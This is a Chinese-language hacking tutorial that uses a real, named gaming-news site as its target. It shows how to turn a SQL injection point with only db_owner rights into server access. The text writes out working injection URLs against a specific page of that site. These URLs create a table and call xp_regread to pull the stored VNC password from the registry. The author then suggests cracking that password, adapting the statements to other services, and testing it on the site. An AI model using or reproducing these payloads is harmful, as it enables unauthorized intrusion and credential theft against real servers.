现在网站注入是当今最流行的网站入侵技术了,国内各大网站也都存在注入,或许是觉得这些
网站比较大就不会存在漏洞,也没有人去检测他们吧!不要把那些知名站点的编成人员想得那
么厉害,!!!!
我也好久没有做教程了,今天就和大家讲讲像17173这些网站得到注入点后如何继续检测呢?
很多朋友在对网站进行得到注入点,猜不到密码\查询不到后台,在一看只有db_owner角色,
汉~~~~~~~~大部分都在这里就对这个网站死心了.
其实不然,下面我就以国内知名网站,世界排行在前的网站17173为例说明如何在上述情况下
取得服务器权限.(只作说明,不进行演习,有兴趣的可以自己去测试)因为偶怕警察叔叔抓~~~~~~~~~~~`
最好是不怕抓的进行测试,像我一样胆子小的就面了吧!!!!!!!!!!1
1、查找注入点
如何查找注入点略 以前有N多文章自己找去
我已经找到,地址如下http://news.17173.com/m_false.asp?newsid=70739
1=1 正确 1=2 错误,说明存在注入
2、然后用NBSI进行检测 我的NBSI比较老 , 因为很久没有玩注入了
那只有DB_OWNER权限,
接下去我就不再演示了,大家看下思路就好了
3、进行网站服务器所开端口扫描,来获得主机开放服务,(这里略)自己扫去
4、我们假设这里开放有VNC 服务VNC对应端口号5900(实际此网站开放了什么服务需要你自己去查看)
我们在服务器上面创建一个名为的ding的表,并且添加了类型是char,字段名dlin。
(数据类型uniqueidentifier,是用来存储一个16字节长的二进制数据类型)
然后向表中加数据:
命令:http://news.17173.com/m_false.asp?newsid=70739;create table [dbo].[ding] ([dlin][uniqueidentifier]);
大家看这里
这个是做教程之前创建的表
然后向表中加数据
命令:http://news.17173.com/m_false.asp?newsid=70739;DECLARE @result uniqueidentifier
EXEC master.dbo.xp_regread HKEY_CURRENT_USER,Software\ORL\WinVNC3, Password,
@result output insert into ding (dlin) values(@result);--
上面命令的意思是说:从注册表中读取VNC在注册表的加密密码的值,再把这个值插入到刚建的ding表中。
以此暴出VNC在注册表的加密密码:
我们来查看结果 http://news.17173.com/;and 1=(select count(*) from ding where dlin > 1
结果我们就可以看到加密后的VNC密码了,然后再用工具跑出密码,接下来要做什么不用我说了吧???
当然这只是个例子,如果服务器没有开VNC,其他服务也是一样的.大家只要稍把上面的语句改一下就可以了
好了今天大体就讲这么多吧!